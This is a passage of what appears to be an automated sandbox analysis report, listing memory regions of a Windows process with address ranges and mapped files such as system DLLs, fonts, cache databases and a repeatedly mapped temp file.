0x73966fff entry_point = 0x73950000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1693 start_va = 0x74990000 end_va = 0x7499afff entry_point = 0x74991992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1694 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 1698 start_va = 0x8b0000 end_va = 0x8b3fff entry_point = 0x8b0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1699 start_va = 0xd50000 end_va = 0xd51fff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 1700 start_va = 0xda0000 end_va = 0xda3fff entry_point = 0xda0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1701 start_va = 0x2410000 end_va = 0x244ffff entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 1702 start_va = 0x2450000 end_va = 0x247ffff entry_point = 0x2450000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db") Region: id = 1703 start_va = 0x2500000 end_va = 0x2565fff entry_point = 0x2500000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1704 start_va = 0x2690000 end_va = 0x26cffff entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 1705 start_va = 0x2af0000 end_va = 0x2b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 1706 start_va = 0x2b30000 end_va = 0x345ffff entry_point = 0x2b30000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1707 start_va = 0x71f00000 end_va = 0x71f15fff entry_point = 0x71f00000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\SysWOW64\\thumbcache.dll" (normalized: "c:\\windows\\syswow64\\thumbcache.dll") Region: id = 1708 start_va = 0x756e0000 end_va = 0x756e4fff entry_point = 0x756e1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1709 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 1710 start_va = 0x754f0000 end_va = 0x75516fff entry_point = 0x754f58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1711 start_va = 0x755b0000 end_va = 0x755c1fff entry_point = 0x755b1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1712 start_va = 0x76940000 end_va = 0x76adcfff entry_point = 0x769417e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1713 start_va = 0xdb0000 end_va = 0xdbffff entry_point = 0xdb0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1714 start_va = 0x2250000 end_va = 0x225ffff entry_point = 0x2250000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1715 start_va = 0x2260000 end_va = 0x226ffff entry_point = 0x2260000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1716 start_va = 0x23b0000 end_va = 0x23bffff entry_point = 0x23b0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1717 start_va = 0x23c0000 end_va = 0x23cffff entry_point = 0x23c0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1718 start_va = 0x2480000 end_va = 0x248ffff entry_point = 0x2480000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1719 start_va = 0x2490000 end_va = 0x249ffff entry_point = 0x2490000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1720 start_va = 0x24a0000 end_va = 0x24affff entry_point = 0x24a0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1721 start_va = 0x24b0000 end_va = 0x24bffff entry_point = 0x24b0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1722 start_va = 0x2570000 end_va = 0x257ffff entry_point = 0x2570000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1723 start_va = 0x2590000 end_va = 0x259ffff entry_point = 0x2590000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1724 start_va = 0x25a0000 end_va = 0x25affff entry_point = 0x25a0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1725 start_va = 0x25b0000 end_va = 0x25bffff entry_point = 0x25b0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1726 start_va = 0x25c0000 end_va = 0x25cffff entry_point = 0x25c0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1727 start_va = 0x25d0000 end_va = 0x25dffff entry_point = 0x25d0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1728 start_va = 0x2660000 end_va = 0x266ffff entry_point = 0x2660000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1729 start_va = 0x2670000 end_va = 0x267ffff entry_point = 0x2670000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1730 start_va = 0x2680000 end_va = 0x268ffff entry_point = 0x2680000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1731 start_va = 0x26d0000 end_va = 0x26dffff entry_point = 0x26d0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1732 start_va = 0x26e0000 end_va = 0x26effff entry_point = 0x26e0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1733 start_va = 0x2730000 end_va = 0x273ffff entry_point = 0x2730000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1734 start_va = 0x2740000 end_va = 0x274ffff entry_point = 0x2740000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1735 start_va = 0x2750000 end_va = 0x275ffff entry_point = 0x2750000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1736 start_va = 0x27a0000 end_va = 0x27affff entry_point = 0x27a0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1737 start_va = 0x27b0000 end_va = 0x27bffff entry_point = 0x27b0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1738 start_va = 0x27c0000 end_va = 0x27cffff entry_point = 0x27c0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1739 start_va = 0x27d0000 end_va = 0x27dffff entry_point = 0x27d0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1740 start_va = 0x27e0000 end_va = 0x27effff entry_point = 0x27e0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1741 start_va = 0x2900000 end_va = 0x2979fff entry_point = 0x2900000 region_type = mapped_file name = "segoeuib.ttf" filename = "\\Windows\\Fonts\\segoeuib.ttf" (normalized: "c:\\windows\\fonts\\segoeuib.ttf") Region: id = 1742 start_va = 0x2980000 end_va = 0x298ffff entry_point = 0x2980000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1743 start_va = 0x2990000 end_va = 0x29cffff entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 1744 start_va = 0x29d0000 end_va = 0x29dffff entry_point = 0x29d0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1745 start_va = 0x29e0000 end_va = 0x29effff entry_point = 0x29e0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1746 start_va = 0x29f0000 end_va = 0x29fffff entry_point = 0x29f0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1747 start_va = 0x2a00000 end_va = 0x2a0ffff entry_point = 0x2a00000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1748 start_va = 0x2a10000 end_va = 0x2a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 1749 start_va = 0x2a50000 end_va = 0x2a5ffff entry_point = 0x2a50000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1750 start_va = 0x2a60000 end_va = 0x2a6ffff entry_point = 0x2a60000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1751 start_va = 0x2a70000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 1752 start_va = 0x2ab0000 end_va = 0x2abffff entry_point = 0x2ab0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1753 start_va = 0x2ac0000 end_va = 0x2acffff entry_point = 0x2ac0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1754 start_va = 0x2ad0000 end_va = 0x2adffff entry_point = 0x2ad0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1755 start_va = 0x2ae0000 end_va = 0x2aeffff entry_point = 0x2ae0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1756 start_va = 0x3460000 end_va = 0x3852fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003460000" filename = "" Region: id = 1757 start_va = 0x3860000 end_va = 0x3860fff entry_point = 0x3860000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1758 start_va = 0x3900000 end_va = 0x393ffff entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1759 start_va = 0x3940000 end_va = 0x394ffff entry_point = 0x3940000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1760 start_va = 0x3950000 end_va = 0x395ffff entry_point = 0x3950000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1761 start_va = 0x3960000 end_va = 0x396ffff entry_point = 0x3960000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1762 start_va = 0x3970000 end_va = 0x397ffff entry_point = 0x3970000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1763 start_va = 0x3980000 end_va = 0x398ffff entry_point = 0x3980000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1764 start_va = 0x3990000 end_va = 0x399ffff entry_point = 0x3990000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1765 start_va = 0x39a0000 end_va = 0x39affff entry_point = 0x39a0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1766 start_va = 0x39b0000 end_va = 0x39bffff entry_point = 0x39b0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1767 start_va = 0x39c0000 end_va = 0x39cffff entry_point = 0x39c0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1768 start_va = 0x39d0000 end_va = 0x39dffff entry_point = 0x39d0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1769 start_va = 0x39e0000 end_va = 0x39effff entry_point = 0x39e0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1770 start_va = 0x39f0000 end_va = 0x39fffff entry_point = 0x39f0000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1771 start_va = 0x3a00000 end_va = 0x3a0ffff entry_point = 0x3a00000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1772 start_va = 0x3a10000 end_va = 0x3a1ffff entry_point = 0x3a10000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1773 start_va = 0x3a20000 end_va = 0x3a2ffff entry_point = 0x3a20000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1774 start_va = 0x3a30000 end_va = 0x3a3ffff entry_point = 0x3a30000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1775 start_va = 0x3a40000 end_va = 0x3a4ffff entry_point = 0x3a40000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1776 start_va = 0x3a50000 end_va = 0x3a5ffff entry_point = 0x3a50000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1777 start_va = 0x3a60000 end_va = 0x3a6ffff entry_point = 0x3a60000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1778 start_va = 0x3a70000 end_va = 0x3a7ffff entry_point = 0x3a70000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1779 start_va = 0x3a80000 end_va = 0x3a8ffff entry_point = 0x3a80000 region_type = mapped_file name = "~pi4b32.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4B32.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4b32.tmp") Region: id = 1780 start_va = 0x71e80000 end_va = 0x71eb7fff entry_point = 0x71e80000 region_type = mapped_file name = "icm32.dll" filename = "\\Windows\\SysWOW64\\icm32.dll" (normalized: "c:\\windows\\syswow64\\icm32.dll") Region: id = 1781 start_va = 0x7ef95000 end_va = 0x7ef97fff entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 1782 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 1783 start_va = 0x3870000 end_va = 0x3870fff entry_point = 0x3870000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1784 start_va = 0x3880000 end_va = 0x3880fff entry_point = 0x3880000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1785 start_va = 0x3890000 end_va = 0x389ffff entry_point = 0x3890000 region_type = mapped_file name = "~pi4bcf.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4BCF.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4bcf.tmp") Region: id = 1786 start_va = 0x38a0000 end_va = 0x38affff entry_point = 0x38a0000 region_type = mapped_file name = "~pi4bcf.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~PI4BCF.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~pi4bcf.tmp") Region: id = 1787 start_va = 0x38d0000 end_va = 0x38d0fff entry_point = 0x38d0000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1788 start_va = 0x38e0000 end_va = 0x38e0fff entry_point = 0x38e0000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1789 start_va = 0x38f0000 end_va = 0x38f0fff entry_point = 0x38f0000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1790 start_va = 0x3a90000 end_va = 0x3a90fff entry_point = 0x3a90000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1791 start_va = 0x3aa0000 end_va = 0x3abbfff entry_point = 0x0 region_type = private name = "private_0x0000000003aa0000" filename = "" Region: id = 1792 start_va = 0x3ac0000 end_va = 0x3acafff entry_point = 0x0 region_type = private name = "private_0x0000000003ac0000" filename = "" Region: id = 1793 start_va = 0x3ad0000 end_va = 0x3ad2fff entry_point = 0x0 region_type = private name = "private_0x0000000003ad0000" filename = "" Region: id = 1794 start_va = 0x3ae0000 end_va = 0x3ae1fff entry_point = 0x0 region_type = private name = "private_0x0000000003ae0000" filename = "" Region: id = 1795 start_va = 0x3af0000 end_va = 0x3b6efff entry_point = 0x3af0000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 1796 start_va = 0x3b70000 end_va = 0x3baffff entry_point = 0x0 region_type = private name = "private_0x0000000003b70000" filename = "" Region: id = 1797 start_va = 0x3bb0000 end_va = 0x3beffff entry_point = 0x0 region_type = private name = "private_0x0000000003bb0000" filename = "" Region: id = 1798 start_va = 0x3bf0000 end_va = 0x3c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000003bf0000" filename = "" Region: id = 1799 start_va = 0x3c30000 end_va = 0x3c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c30000" filename = "" Region: id = 1800 start_va = 0x3c70000 end_va = 0x3c81fff entry_point = 0x0 region_type = private name = "private_0x0000000003c70000" filename = "" Region: id = 1801 start_va = 0x3c90000 end_va = 0x3cabfff entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 1802 start_va = 0x3cb0000 end_va = 0x3ceffff entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 1803 start_va = 0x3cf0000 end_va = 0x3d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 1804 start_va = 0x3d30000 end_va = 0x3d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d30000" filename = "" Region: id = 1805 start_va = 0x3d70000 end_va = 0x3daffff entry_point = 0x0 region_type = private name = "private_0x0000000003d70000" filename = "" Region: id = 1806 start_va = 0x3db0000 end_va = 0x3dc1fff entry_point = 0x0 region_type = private name = "private_0x0000000003db0000" filename = "" Region: id = 1807 start_va = 0x3dd0000 end_va = 0x3de7fff entry_point = 0x0 region_type = private name = "private_0x0000000003dd0000" filename = "" Region: id = 1808 start_va = 0x3df0000 end_va = 0x3e07fff entry_point = 0x0 region_type = private name = "private_0x0000000003df0000" filename = "" Region: id = 1809 start_va = 0x3e10000 end_va = 0x3e27fff entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 1810 start_va = 0x3e30000 end_va = 0x3e47fff entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 1811 start_va = 